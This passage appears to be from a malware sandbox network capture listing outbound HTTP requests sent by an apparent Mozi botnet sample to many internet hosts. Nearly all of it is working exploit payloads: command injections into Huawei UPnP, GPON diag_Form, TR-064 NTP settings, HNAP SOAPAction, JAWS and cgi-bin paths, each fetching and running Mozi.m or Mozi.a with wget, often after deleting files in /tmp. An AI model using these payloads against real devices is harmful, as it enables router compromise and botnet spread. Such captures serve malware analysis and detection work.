                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              77192.168.2.2360742149.241.161.18037215
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264585018 CET823OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                              Host: 149.241.161.180:37215
                                                              Content-Length: 601
                                                              Connection: keep-alive
                                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              78192.168.2.2360422184.96.7.288080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264596939 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:8080
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              79192.168.2.23406309.109.75.1278080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264619112 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:8080
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              80192.168.2.2347894206.142.193.1527574
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264637947 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:7574
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              81192.168.2.235642447.30.123.2128080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264661074 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:8080
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              82192.168.2.235894087.120.225.1175555
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264684916 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:5555
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              83192.168.2.2333058140.81.126.1158443
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264702082 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              84192.168.2.2344964153.95.193.1215555
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264722109 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:5555
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              85192.168.2.233863256.53.8.680
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264743090 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              86192.168.2.233317291.53.41.21781
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264760971 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              87192.168.2.2334024193.94.36.4380
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264784098 CET279OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                              User-Agent: Hello, world
                                                              Host: 193.94.36.43:80
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                              Connection: keep-alive


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              88192.168.2.233876018.65.35.2008443
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264806032 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              89192.168.2.235589231.225.239.9581
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264822006 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              90192.168.2.234821893.31.4.22549152
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264861107 CET929OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                              Host: 93.31.4.225:49152
                                                              Content-Length: 630
                                                              Accept-Encoding: gzip, deflate
                                                              SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Connection: keep-alive
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              91192.168.2.2343226206.130.7.228080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264874935 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:8080
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              92192.168.2.2339352222.38.112.22880
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264895916 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                              Host: 127.0.0.1:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: Hello, World
                                                              Content-Length: 118
                                                              Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              93192.168.2.2344030137.27.133.908443
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264914036 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              94192.168.2.2345400203.2.27.21980
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.264942884 CET801OUTPOST /HNAP1/ HTTP/1.0
                                                              Host: 203.2.27.219:80
                                                              Content-Type: text/xml; charset="utf-8"
                                                              SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
